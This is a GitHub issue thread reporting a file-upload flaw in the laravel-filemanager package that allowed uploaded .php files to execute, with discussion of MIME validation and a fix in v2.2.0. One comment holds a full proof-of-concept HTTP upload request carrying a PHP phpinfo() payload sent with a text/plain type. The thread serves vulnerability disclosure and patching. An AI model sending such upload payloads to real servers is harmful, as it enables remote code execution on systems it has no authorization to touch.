### ISSUE TITLE
File Upload Attack

### ISSUE THREAD

**Issue by fzyzcjy** [UniSharp/laravel-filemanager#356]
This file manager is good, but it has a dangerous bug: you can easily attack the server by uploading files. For example, I uploaded a `.php` file, then visit the url, and the php executed successfully.
As so many people use this project, I think it is of great significance to fix it. Hope my words will help.

**Comment by codejam1024** [comment]
@turtlegood http://unisharp.github.io/laravel-filemanager/config
// If true, the uploading file's mime type will be valid in valid_image_mimetypes/valid_file_mimetypes.
'should_validate_mime' => true,

**Comment by gedamin** [comment]
If I will put true:
'should_validate_mime' => true,
Is it protect .php execution?

**Comment by codejam1024** [comment]
@gedamin
PHP file is no uploaded and says:
Unexpected MimeType: text/x-php

**Comment by turtlegood** [comment]
@codejam1024 @gedamin However, there are many other types of attack. For example, have you prevented people from renaming one file to `.php` file?

**Comment by codejam1024** [comment]
@turtlegood 
// available since v1.3.0
    'valid_image_mimetypes' => [
        'image/jpeg',
        'image/pjpeg',
        'image/png',
        'image/gif',
        'image/svg+xml',
    ],

    // available since v1.3.0
    // only when '/laravel-filemanager?type=Files'
    'valid_file_mimetypes' => [
        'image/jpeg',
        'image/pjpeg',
        'image/png',
        'image/gif',
        'image/svg+xml',
        'application/pdf',
        'text/plain',
    ],

**Comment by codejam1024** [comment]
@turtlegood 
If the hacker can change your code or change your files,  that is your server security issues
    // available since v1.3.0
    'valid_image_mimetypes' => [
        'image/jpeg',
        'image/pjpeg',
        'image/png',
        'image/gif',
        'image/svg+xml',
    ],

    // available since v1.3.0
    // only when '/laravel-filemanager?type=Files'
    'valid_file_mimetypes' => [
        'image/jpeg',
        'image/pjpeg',
        'image/png',
        'image/gif',
        'image/svg+xml',
        'application/pdf',
        'text/plain',
    ]

**Comment by g0110280** [comment]
This is an interesting issue. @turtlegood could you provide a list of possible attacks so we can test with this package?

**Comment by turtlegood** [comment]
@codejam1024 that can only prevent mime things, not the others.

**Comment by turtlegood** [comment]
@g0110280 Can you read Chinese? I have a very good pdf in Chinese, explaining various great attacks.

**Comment by codejam1024** [comment]
@turtlegood 
Ok, put the link here

**Comment by g0110280** [comment]
@turtlegood yes I can read Chinese, thanks.

**Comment by turtlegood** [comment]
@codejam1024 @g0110280 
this file:
[Upload_Attack_Framework (1).pdf](https://github.com/UniSharp/laravel-filemanager/files/1107623/Upload_Attack_Framework.1.pdf)
or google it: `upload attack framework.pdf`

**Comment by codejam1024** [comment]
@g0110280 
POST /laravel-filemanager/upload HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:8000/laravel-filemanager?type=Files
Content-Length: 527
Content-Type: multipart/form-data; boundary=---------------------------12194679330849
Cookie:laravel_session=eyJpdiI6IlplemdVaG9FSm9MaXJobEgrYlwvSkhnPT0iLCJ2YWx1ZSI6IkhrZ2R1OGV6czRFM1VzSDZZaU9XUXJBejNhVndsRlp6aUlcL0NXNzY0N21xVGFSXC8zb0p1Nlp5dWVWdDBJV2dXSlB6dTdGYlE3QU9aRWJhak9LMCtTRHc9PSIsIm1hYyI6IjhjMTMxOTVmZDcxNmUwMDBiMTg4OTU5MmY2YTFjYTc3MGU2MTNkNTkyMTZkMzhlZDY3YjI5YzdlYmNlYzk0MGQifQ%3D%3D
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


-----------------------------260082409123824
Content-Disposition: form-data; name="upload[]"; filename="test.php"
Content-Type: text/plain

asdasdasdasdsa
<?
phpinfo();
?>
asdasdasdsad
-----------------------------260082409123824
Content-Disposition: form-data; name="working_dir"

/1
-----------------------------260082409123824
Content-Disposition: form-data; name="type"

Files
-----------------------------260082409123824
Content-Disposition: form-data; name="_token"

MU5XhVxbrkRnkVJFUHCjdfNSVTKm3qro6OgtWXjy
-----------------------------260082409123824--

**Comment by codejam1024** [comment]
@g0110280 
[attack_post.txt](https://github.com/UniSharp/laravel-filemanager/files/1107677/attack_post.txt)

**Comment by codejam1024** [comment]
'image/jpeg' = force save .jpg
'image/png' = force save .png
'image/gif' = force save .gif
'application/pdf' = force save .pdf
'text/plain' = force save .txt

**Comment by codejam1024** [comment]
'image/jpeg' = save .jpg
'image/png' = save .png
'image/gif' = save .gif
'application/pdf' =  save .pdf
'text/plain' = save .txt

**Comment by codejam1024** [comment]
what is going on?

**Comment by streamtw** [comment]
Fixed in `v2.2.0`, thanks for reporting this.

**Comment by fzyzcjy** [comment]
Congratulations!
